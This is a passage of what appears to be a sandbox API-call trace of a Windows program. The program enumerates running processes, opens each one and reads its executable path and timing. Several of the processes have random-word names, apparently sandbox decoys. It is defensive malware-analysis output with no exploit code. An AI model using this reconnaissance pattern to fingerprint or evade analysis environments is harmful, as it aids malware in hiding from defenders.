pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0069.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0069.229] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0069.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x19c) returned 0x0 [0069.229] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0069.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0069.230] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0069.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0069.230] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0069.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0069.231] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.232] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x0 [0069.232] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.232] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x26c) returned 0x0 [0069.232] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0069.233] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d8) returned 0x0 [0069.233] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x55, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.233] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x0 [0069.233] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.234] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x340) returned 0x0 [0069.234] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.234] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0069.234] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.235] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0069.235] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.235] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x0 [0069.235] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.236] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0069.236] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0069.236] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0069.236] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x424, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.237] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x0 [0069.237] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.237] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x44c) returned 0x0 [0069.237] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0069.238] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4d0) returned 0x0 [0069.238] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.238] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5e0) returned 0x0 [0069.239] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x318, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0069.239] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c8) returned 0x260 [0069.239] LoadLibraryW (lpLibFileName="psapi.dll") returned 0x76ec0000 [0069.240] GetProcAddress (hModule=0x76ec0000, lpProcName="GetModuleBaseNameW") returned 0x76ec1420 [0069.240] GetProcAddress (hModule=0x76ec0000, lpProcName="EnumProcessModules") returned 0x76ec13a0 [0069.240] GetProcAddress (hModule=0x76ec0000, lpProcName="GetModuleFileNameExW") returned 0x76ec1400 [0069.240] GetProcAddress (hModule=0x76ec0000, lpProcName="EnumProcesses") returned 0x76ec13c0 [0069.240] GetProcAddress (hModule=0x76ec0000, lpProcName="GetModuleInformation") returned 0x76ec16a0 [0069.240] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0069.241] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\System32\\sihost.exe" | out: _Dest="C:\\Windows\\System32\\sihost.exe") returned="C:\\Windows\\System32\\sihost.exe" [0069.241] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.241] CloseHandle (hObject=0x260) returned 1 [0069.241] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x318, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0069.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x260 [0069.241] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0069.241] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\System32\\taskhostw.exe" | out: _Dest="C:\\Windows\\System32\\taskhostw.exe") returned="C:\\Windows\\System32\\taskhostw.exe" [0069.241] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.241] CloseHandle (hObject=0x260) returned 1 [0069.241] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0069.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x698) returned 0x260 [0069.242] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0069.242] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\System32\\RuntimeBroker.exe" | out: _Dest="C:\\Windows\\System32\\RuntimeBroker.exe") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0069.242] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.242] CloseHandle (hObject=0x260) returned 1 [0069.242] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x80c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0069.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x260 [0069.243] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe")) returned 0x17 [0069.243] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\explorer.exe" | out: _Dest="C:\\Windows\\explorer.exe") returned="C:\\Windows\\explorer.exe" [0069.243] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.243] CloseHandle (hObject=0x260) returned 1 [0069.243] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0069.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x260 [0069.244] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0069.244] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" | out: _Dest="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0069.244] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.244] CloseHandle (hObject=0x260) returned 1 [0069.244] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0069.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa1c) returned 0x260 [0069.244] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0069.245] wcscpy (in: _Dest=0x199040, _Source="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" | out: _Dest="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0069.245] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.245] CloseHandle (hObject=0x260) returned 1 [0069.245] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="hadgdp.exe")) returned 1 [0069.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec) returned 0x260 [0069.246] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe" (normalized: "c:\\program files\\microsoft office 15\\hadgdp.exe")) returned 0x2f [0069.246] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe" | out: _Dest="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe") returned="C:\\Program Files\\Microsoft Office 15\\hadgdp.exe" [0069.246] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.246] CloseHandle (hObject=0x260) returned 1 [0069.246] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="mergerbass.exe")) returned 1 [0069.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x200) returned 0x260 [0069.247] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\mergerbass.exe" (normalized: "c:\\program files (x86)\\common files\\mergerbass.exe")) returned 0x32 [0069.247] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files (x86)\\Common Files\\mergerbass.exe" | out: _Dest="C:\\Program Files (x86)\\Common Files\\mergerbass.exe") returned="C:\\Program Files (x86)\\Common Files\\mergerbass.exe" [0069.247] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.247] CloseHandle (hObject=0x260) returned 1 [0069.247] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x404, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="italianbreakfast.exe")) returned 1 [0069.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x404) returned 0x260 [0069.248] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Mail\\italianbreakfast.exe" (normalized: "c:\\program files\\windows mail\\italianbreakfast.exe")) returned 0x32 [0069.248] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Windows Mail\\italianbreakfast.exe" | out: _Dest="C:\\Program Files\\Windows Mail\\italianbreakfast.exe") returned="C:\\Program Files\\Windows Mail\\italianbreakfast.exe" [0069.248] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.248] CloseHandle (hObject=0x260) returned 1 [0069.248] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="merger raw.exe")) returned 1 [0069.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x260 [0069.248] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\merger raw.exe" (normalized: "c:\\program files\\microsoft office\\merger raw.exe")) returned 0x30 [0069.249] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Microsoft Office\\merger raw.exe" | out: _Dest="C:\\Program Files\\Microsoft Office\\merger raw.exe") returned="C:\\Program Files\\Microsoft Office\\merger raw.exe" [0069.249] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.249] CloseHandle (hObject=0x260) returned 1 [0069.249] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="protein announcements processes.exe")) returned 1 [0069.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x260 [0069.249] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Google\\protein announcements processes.exe" (normalized: "c:\\program files (x86)\\google\\protein announcements processes.exe")) returned 0x41 [0069.249] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files (x86)\\Google\\protein announcements processes.exe" | out: _Dest="C:\\Program Files (x86)\\Google\\protein announcements processes.exe") returned="C:\\Program Files (x86)\\Google\\protein announcements processes.exe" [0069.249] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.249] CloseHandle (hObject=0x260) returned 1 [0069.250] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="cdt_expenditure_vincent.exe")) returned 1 [0069.250] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x418) returned 0x260 [0069.251] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe" (normalized: "c:\\program files\\internet explorer\\cdt_expenditure_vincent.exe")) returned 0x3e [0069.251] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe" | out: _Dest="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe") returned="C:\\Program Files\\Internet Explorer\\cdt_expenditure_vincent.exe" [0069.251] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.251] CloseHandle (hObject=0x260) returned 1 [0069.251] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="woundchristopher.exe")) returned 1 [0069.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb00) returned 0x260 [0069.251] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe" (normalized: "c:\\program files\\microsoft office 15\\woundchristopher.exe")) returned 0x39 [0069.251] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe" | out: _Dest="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe") returned="C:\\Program Files\\Microsoft Office 15\\woundchristopher.exe" [0069.252] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.252] CloseHandle (hObject=0x260) returned 1 [0069.252] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="irrigation_teach.exe")) returned 1 [0069.252] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2d4) returned 0x260 [0069.252] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe" (normalized: "c:\\program files\\windows portable devices\\irrigation_teach.exe")) returned 0x3e [0069.252] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe" | out: _Dest="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe") returned="C:\\Program Files\\Windows Portable Devices\\irrigation_teach.exe" [0069.252] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.252] CloseHandle (hObject=0x260) returned 1 [0069.252] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="suspect promoting stroke.exe")) returned 1 [0069.253] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf0) returned 0x260 [0069.253] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe" (normalized: "c:\\program files\\windows portable devices\\suspect promoting stroke.exe")) returned 0x46 [0069.253] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe" | out: _Dest="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe") returned="C:\\Program Files\\Windows Portable Devices\\suspect promoting stroke.exe" [0069.253] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268 | out: lpCreationTime=0x199250, lpExitTime=0x199258, lpKernelTime=0x199260, lpUserTime=0x199268) returned 1 [0069.253] CloseHandle (hObject=0x260) returned 1 [0069.253] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="piepokemon.exe")) returned 1 [0069.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x260 [0069.254] GetModuleFileNameExW (in: hProcess=0x260, hModule=0x0, lpFilename=0x198c04, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\piepokemon.exe" (normalized: "c:\\program files\\windows sidebar\\piepokemon.exe")) returned 0x2f [0069.254] wcscpy (in: _Dest=0x199040, _Source="C:\\Program Files\\Windows Sidebar\\piepokemon.exe" | out: _Dest="C:\\Program Files\\Windows Sidebar\\piepokemon.exe") 